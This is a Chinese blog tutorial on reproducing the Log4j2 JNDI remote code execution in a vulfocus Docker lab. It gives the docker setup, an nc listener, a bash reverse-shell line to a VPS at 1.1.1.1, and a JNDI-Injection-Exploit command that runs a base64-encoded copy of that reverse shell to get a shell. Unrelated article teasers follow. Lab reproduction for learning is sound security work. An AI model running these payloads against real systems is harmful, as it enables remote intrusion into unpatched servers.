目录

用vulfocus docker漏洞环境

漏洞复现-获取shell

用vulfocus docker漏洞环境

docker pull vulfocus/log4j2-rce-2021-12-09:latest
​
docker run -p  8080:8080 -d --name log4j2-rce  vulfocus/log4j2-rce-2021-12-09

漏洞位置就是在 /hello。路径,请求方式POST 参数 payload。 

 

漏洞复现-获取shell

vps开启nc

nc -lvvp 7777

反弹命令要进行base64编码

bash -i >&/dev/tcp/1.1.1.1/7771 0>&1  #替换其中的IP为自己的vps地址

shell code 编码

地址java.lang.Runtime.exec() Payload Workarounds - @Jackson_Ticon-default.png?t=LBL2https://www.jackson-t.ca/runtime-exec-payloads.html

然后在使用github工具,可以自己编译,也可以直接使用编译好的。

JNDI-Injection-Exploit/README-CN.md at master · welk1n/JNDI-Injection-Exploit · GitHub.

下载好后 在VPS中执行

开启ldap和rmi监听服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEuMS4xLjEvNzc3MSAwPiYx}|{base64,-d}|{bash,-i}" -A "1.1.1.1"

 

在生成的payload 选择一个,我选的不是 JDK1.8和1.7(不知道原理就是照着教程作)。

然后在hackbar中提交请求

成功获得 shell

# web安全
Logo
向您推荐>>Eolink开发者社区

权威|前沿|技术|干货|国内首个API全生命周期开发者社区

更多推荐

ELK实现containerd的容器日志采集展示【基于logging的全栈监测】

企业级ELK Stack构建介绍

avatar 云原生

深入理解 Mocha 测试框架:从零实现一个 Mocha

前言什么是自动化测试自动化测试在很多团队中都是Devops环节中很难执行起来的一个环节,主要原因在于测试代码的编写工作很难抽象,99%的场景都需要和业务强绑定,而且写测试代码的编写工作量往往比编写实际业务代码的工作量更多。在一些很多业务场景中投入产出比很低,适合写自动化测试的应该是那些中长期业务以及一些诸如组件一样的基础库。自动化测试是个比较大的概念,其中分类也比较多,比如单元测试,端对端测试,集

avatar 云原生

(20200916 Solved)docker-compose up创建容器自动退出

问题描述如题,创建容器后自动退出了。并且docker start container无效解决方案原因是缺失了控制终端的配置,需要在docker-compose.yml中增加tty:true ,有时候这样也不行,需要再增加一个command:/bin/bash,命令不一定是这个,需要是一个不会退出的命令,然后用-d后台启动容器。Referencesdocker-compose启动容器后自动退出...

avatar 云原生